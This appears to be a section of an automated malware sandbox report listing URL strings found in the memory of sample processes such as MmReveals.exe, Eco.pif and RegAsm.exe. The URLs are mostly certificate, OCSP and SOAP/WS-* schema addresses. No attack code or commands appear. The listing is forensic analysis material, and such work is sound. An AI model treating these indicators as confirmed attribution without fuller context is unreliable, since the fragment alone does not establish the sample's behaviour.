                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: MmReveals.exe, 00000003.00000000.1652016339.0000000000408000.00000002.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
